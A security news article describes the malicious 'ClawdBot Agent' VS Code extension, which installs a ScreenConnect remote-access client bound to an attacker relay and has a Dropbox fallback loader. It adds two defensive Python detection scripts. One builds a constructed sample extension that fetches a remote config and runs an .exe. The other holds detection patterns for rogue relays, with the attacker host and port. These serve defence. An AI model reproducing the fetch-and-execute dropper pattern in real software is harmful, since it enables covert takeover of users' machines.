Malicious ClawdBot Agent VS Code Extension Deploys ScreenConnect RAT, Targets Developers

A new cybersecurity threat has emerged targeting developers through a malicious Visual Studio Code (VS Code) extension named ClawdBot Agent. Discovered on January 27, 2026, this extension masquerades as a legitimate AI-powered assistant but conceals a harmful payload designed to compromise user systems.

Deceptive Appearance and Functionality

The ClawdBot Agent extension presents itself as an AI coding assistant that integrates with well-known providers such as OpenAI, Anthropic, and Google. Because that front-end functionality actually works, the extension appears to perform as advertised, which lowers suspicion; it also means users hand it their provider API keys, which is why those keys have to be treated as exposed once the extension is removed. The genuine Clawdbot project has not released an official VS Code extension; the attackers simply registered the name on the Marketplace before anyone else did, so users searching for one found the impostor.

Immediate Malicious Activity

Upon installation, the extension silently deploys malware onto Windows machines without any prompt or consent. Security monitoring flagged unusual activity as soon as VS Code was launched with the extension installed; no further user interaction was needed to trigger the payload. Microsoft removed the extension from the VS Code Marketplace shortly after it was reported, which stops new installs but does not clean up machines that already have it (see the recommendations below).

Technical Analysis and Infection Mechanism

Security analysts at Aikido investigated the extension and found that its activation code runs every time VS Code starts, not only when a user invokes a command. That JavaScript contacts an external server to fetch a configuration, and the configuration in turn directs it to download and execute several malicious files whose names mimic legitimate system components. Outbound traffic alone is not the tell here, since a real AI assistant also calls remote APIs; the combination of unconditional activation at startup with fetching and executing binaries is.
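The following Python script is an added example, not code from the article or from Aikido's analysis. It turns the pattern just described into a triage check over unpacked VS Code extensions (the per-extension directories under ~/.vscode/extensions, each carrying a package.json): it flags any extension whose activationEvents fire on every launch ("*" or onStartupFinished) and whose own JavaScript also makes network calls, spawns processes, or references Windows binaries. The two extensions it scans are constructed in a temporary directory for the demonstration; their publisher names, URL and file paths are invented, and the indicator regexes are deliberately broad because this is a filter for human review, not a verdict engine.

```python
"""Triage unpacked VS Code extensions for auto-start plus network/exec indicators.
Added example, not the page's or Aikido's code; sample extensions below are constructed."""
import json
import re
import tempfile
from pathlib import Path

# activationEvents that fire as soon as VS Code starts, without any user action
STARTUP_EVENTS = {"*", "onStartupFinished"}

# Source-level indicators, deliberately broad: a triage filter, not a verdict engine.
INDICATORS = {
    "network_call": re.compile(r"\b(https?\.(get|request)|fetch\(|axios\.|net\.connect)"),
    "spawns_process": re.compile(r"(child_process|execSync|spawnSync|\bspawn\(|\bexec\()"),
    "drops_binary": re.compile(r"\.(exe|dll|msi)\b"),
}
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def triage_extension(ext_dir: Path) -> dict:
    """Return startup behaviour, indicators and hard-coded URLs for one unpacked extension."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    events = set(manifest.get("activationEvents", []))
    result = {
        "id": f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}",
        "starts_on_launch": bool(events & STARTUP_EVENTS),
        "indicators": [],
        "urls": set(),
    }
    # Scan the extension's own JavaScript; skip bundled dependencies to limit noise.
    for js in ext_dir.rglob("*.js"):
        if "node_modules" in js.parts:
            continue
        src = js.read_text(encoding="utf-8", errors="replace")
        for label, pattern in INDICATORS.items():
            if label not in result["indicators"] and pattern.search(src):
                result["indicators"].append(label)
        result["urls"].update(URL_RE.findall(src))
    result["urls"] = sorted(result["urls"])
    # Auto-start combined with network or exec capability is what deserves a human look.
    risky = {"network_call", "spawns_process", "drops_binary"}
    result["verdict"] = "review" if result["starts_on_launch"] and risky & set(result["indicators"]) else "ok"
    return result


def triage_all(extensions_root: Path) -> list:
    """Triage every subdirectory with a package.json, 'review' hits first."""
    results = [triage_extension(d) for d in sorted(extensions_root.iterdir()) if (d / "package.json").is_file()]
    return sorted(results, key=lambda r: r["verdict"] != "review")


def build_sample_extensions(root: Path) -> Path:
    """Create two constructed extensions: one shaped like the auto-start dropper, one benign."""
    bad = root / "fakepub.sample-agent-0.0.1"          # hypothetical publisher/name
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "sample-agent", "publisher": "fakepub",
        "activationEvents": ["*"], "main": "./extension.js"}))
    (bad / "extension.js").write_text(
        'const https = require("https");\n'
        'const { execSync } = require("child_process");\n'
        'function activate() {\n'
        '  https.get("https://config.example.invalid/stage1", res => {\n'  # invented URL
        '    // constructed stand-in for "fetch config, then run a dropped installer"\n'
        '    execSync("C:\\\\Users\\\\Public\\\\update.exe");\n'
        '  });\n'
        '}\nmodule.exports = { activate };\n')
    good = root / "goodpub.linter-1.2.0"               # hypothetical benign extension
    good.mkdir()
    (good / "package.json").write_text(json.dumps({
        "name": "linter", "publisher": "goodpub",
        "activationEvents": ["onLanguage:python"], "main": "./extension.js"}))
    (good / "extension.js").write_text('function activate() {}\nmodule.exports = { activate };\n')
    return root


def run_demo() -> list:
    """Build the constructed extensions in a temp dir and triage them."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_all(build_sample_extensions(Path(tmp)))


if __name__ == "__main__":
    for r in run_demo():
        print(r)
```

Against a real machine, call triage_all(Path.home() / ".vscode" / "extensions") and read the "review" entries by hand: the URLs list is the quickest way to spot a staging server, and an extension that advertises an AI assistant but activates on "*" rather than on a command or language event is worth a closer look even before the indicator hits.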

Deployment of ScreenConnect RAT

A particularly concerning aspect of this attack is its weaponization of legitimate remote access software. The extension deploys ConnectWise ScreenConnect, a widely used IT support tool, pre-configured to report to an attacker-controlled relay at meeting.bulletmailer.net on port 8041, ScreenConnect's default relay port. The attackers stood up their own ScreenConnect relay server, generated client installers bound to it, and distributed those installers through the extension. Victims therefore end up with a fully functional ScreenConnect client that connects to the attackers' infrastructure as soon as it is installed. Because the binary itself is legitimate commercial software, endpoint tooling will rarely flag it on its own; detection has to key on the relay host and port the client is configured to use.
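The following Python script is an added example, not code from the article or from Aikido's analysis. It shows the hunt implied above: a ScreenConnect client carries its relay as a query-string style launch argument (h= for the relay host, p= for the port), so the relay can be recovered from the client service's command line in process-creation telemetry and compared against the relays the organisation actually runs. The event lines are constructed, the allowlist host is hypothetical, and only the known-bad relay (meeting.bulletmailer.net:8041) comes from the article.

```python
"""Hunt for ScreenConnect clients that report to a relay the organisation does not own.
Added example: the event lines are constructed and the relay allowlist is hypothetical."""
import re
from urllib.parse import parse_qs

# Relay hosts legitimately used by the organisation's own ScreenConnect instance (hypothetical).
APPROVED_RELAYS = {"support.example-corp.internal"}

# Attacker relay reported in the article.
KNOWN_BAD_RELAYS = {("meeting.bulletmailer.net", 8041)}

# The ScreenConnect client receives its relay as a query-string style argument
# ("?e=Access&y=Guest&h=<relay host>&p=<relay port>&s=<session id>&k=<key>"),
# so host and port can be pulled out of the service's command line.
SC_ARGS = re.compile(r'ScreenConnect\.(?:ClientService|Client)\.exe"?\s+"?\?([^"]+)')


def parse_relay(cmdline: str):
    """Return (host, port) for a ScreenConnect client command line, or None if it is not one."""
    m = SC_ARGS.search(cmdline)
    if not m:
        return None
    params = parse_qs(m.group(1).strip())
    host = params.get("h", [None])[0]
    port = params.get("p", [None])[0]
    if not host:
        return None
    return host.lower(), (int(port) if port and port.isdigit() else None)


def classify(cmdline: str):
    """Classify one process-creation command line by the relay it points at."""
    relay = parse_relay(cmdline)
    if relay is None:
        return "not_screenconnect", None
    if relay in KNOWN_BAD_RELAYS:
        return "known_bad_relay", relay
    if relay[0] not in APPROVED_RELAYS:
        return "unapproved_relay", relay
    return "approved", relay


# Constructed process-creation events (host, command line), not real telemetry.
SAMPLE_EVENTS = [
    ("DEV-01",
     r'"C:\Program Files (x86)\ScreenConnect Client (4b2e9c1f)\ScreenConnect.ClientService.exe" '
     r'"?e=Access&y=Guest&h=meeting.bulletmailer.net&p=8041&s=00000000-0000-0000-0000-000000000001&k=AAAA"'),
    ("HELPDESK-07",
     r'"C:\Program Files (x86)\ScreenConnect Client (9a77d3e0)\ScreenConnect.ClientService.exe" '
     r'"?e=Access&y=Guest&h=support.example-corp.internal&p=443&s=00000000-0000-0000-0000-000000000002&k=BBBB"'),
    ("DEV-02",
     r'"C:\Users\dev\AppData\Local\Temp\ScreenConnect.Client.exe" '
     r'"?e=Access&y=Guest&h=relay.unknown.example&p=8041&s=00000000-0000-0000-0000-000000000003&k=CCCC"'),
    ("DEV-03", r'"C:\Users\dev\AppData\Roaming\Zoom\bin\Zoom.exe" --update'),
]


def hunt(events):
    """Return (host, verdict, relay) for each ScreenConnect client seen, worst first."""
    hits = []
    for host, cmdline in events:
        verdict, relay = classify(cmdline)
        if verdict != "not_screenconnect":
            hits.append((host, verdict, relay))
    order = {"known_bad_relay": 0, "unapproved_relay": 1, "approved": 2}
    return sorted(hits, key=lambda h: order[h[1]])


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The "unapproved_relay" bucket is the important one in practice: the attackers can change hosts at will, so an allowlist of your own relays catches the next campaign, whereas a blocklist of meeting.bulletmailer.net only catches this one.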

Redundant Delivery Mechanisms

To keep their foothold if the primary infrastructure is taken down, the attackers built in a fallback. A Rust-compiled DLL acts as a secondary loader: it fetches a backup payload from Dropbox, disguised as a Zoom update, so the infection can proceed even when the primary command-and-control server is unreachable. The choice of Dropbox matters for defenders, since that traffic blends in with legitimate use and is not stopped by blocking the attackers' own domains.

Recommendations for Affected Users

Users who have installed the ClawdBot Agent extension should take immediate action to mitigate potential damage:

– Uninstall the Malicious Extension: Remove ClawdBot Agent from VS Code. This stops the loader from running on the next launch but does not undo what it has already installed, so the remaining steps are still required.

– Remove ScreenConnect: Uninstall the ScreenConnect client the extension dropped, along with the fallback DLL, since the Dropbox path does not depend on ScreenConnect. If your organisation legitimately uses ScreenConnect, identify the rogue instance by the relay host it is configured for (meeting.bulletmailer.net) rather than removing every client.

– Block Malicious Domains: Add network-level blocks for the attack infrastructure, such as meeting.bulletmailer.net, and alert on any host that still tries to reach it, since that points to a client that was missed during cleanup.

– Rotate API Keys: Change the keys for every AI provider configured in the extension, since it had them in hand. Because a working ScreenConnect client gives the operator interactive access to the machine, other credentials stored on the host should be rotated as well.

Broader Implications and Preventative Measures

This incident underscores the critical importance of verifying the authenticity of extensions before installation. Developers should exercise caution and adhere to best practices to protect their systems:

– Verify Extension Sources: Check the publisher, not just the name. Confirm that the vendor actually publishes a VS Code extension and links to it from its own site, and weigh install counts, publication date and the publisher's other extensions; a matching name alone proves nothing, as this name-squatting case shows.

– Monitor System Activity: Watch for behaviour that has no business coming from an editor, such as VS Code spawning installers, new services appearing after a launch, or outbound connections from the VS Code process to unfamiliar hosts.

– Keep Software Updated: Maintain up-to-date software to benefit from the latest security patches and protections.

By remaining vigilant and implementing these measures, developers can safeguard their environments against similar threats in the future.